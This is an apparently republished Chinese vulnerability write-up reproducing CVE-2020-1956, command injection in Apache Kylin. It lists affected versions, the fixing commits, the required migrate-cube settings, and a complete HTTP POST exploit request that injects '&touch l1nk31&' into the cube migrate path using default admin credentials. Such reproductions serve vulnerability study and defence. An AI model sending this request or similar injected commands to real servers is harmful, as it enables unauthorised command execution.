menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-1956)Apache Kylin 远程命令执行漏洞 chevron_right (CVE-2020-1956)Apache Kylin 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-1956)Apache Kylin 远程命令执行漏洞.md
    2.17 KB / 2021-07-15 19:48:02
        (CVE-2020-1956)Apache Kylin 远程命令执行漏洞
    ==============================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    Kylin 2.3.0 - 2.3.2Kylin 2.4.0 - 2.4.1Kylin 2.5.0 - 2.5.2Kylin 2.6.0 - 2.6.5Kylin 3.0.0-alpha, Kylin 3.0.0-alpha2, Kylin 3.0.0-beta, Kylin 3.0.0,
    Kylin3.0.1
    
    三、复现过程
    ------------
    
    ### 漏洞分析
    
    在两条commit记录
    
    [KYLIN-4426 Refine
    CliCommandExecutor](https://github.com/apache/kylin/commit/9cc3793ab2f2f0053c467a9b3f38cb7791cd436a)
    
    [KYLIN-4426
    CliCommandExecutor](https://github.com/apache/kylin/commit/335d61b62517006d7e7b55638bb6fd305dffbea1?diff=split)
    
    可以看到动刀子的位置,应该就是漏洞点的命令执行了,**CubeService**
    应该就是命令执行的地方了,然后在
    **CliCommandExecutor.checkParameterWhiteList** 做了一些处理。1.png
    
    2.png
    
    所以根据[CubeController](https://github.com/apache/kylin/blob/master/server-base/src/main/java/org/apache/kylin/rest/controller/CubeController.java),就能找到对应路由了3.jpeg
    
    当然在命令执行的地方触发之前,有几个值判断,因此需要加上这几个东西。4.png
    
        Copy to clipboardkylin.tool.auto-migrate-cube.enabled=true
        kylin.tool.auto-migrate-cube.src-config=/home/admin/apache-kylin-3.0.1-bin-hbase1x
        kylin.tool.auto-migrate-cube.dest-config=/tmp/kylin.properties
    
    ### 漏洞复现
    
        POST /kylin/api/cubes/kylin_sales_cube/aaa&touch%20l1nk31&/migrate HTTP/1.1
        Host: www.0-sec.org:7070
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0
        Accept: application/json, text/plain, */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Cache-Control: no-cache
        Pragma: no-cache
        Authorization: Basic QURNSU46S1lMSU4=
        Connection: close
        Referer: http://127.0.0.1:7070/kylin/admin
        Cookie: project=null; JSESSIONID=2B1DC2A8566558EFF0E6BD91E5BD630E; _ga=GA1.1.636880978.1585905453; rdt_uuid=22a7eaa3-24d1-441a-b4fd-2f87dfe0197f; _fbp=fb.3.1585905456831.913087212
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 11
    
        project=aaa
    
    5.png
    
    
    links
    file_download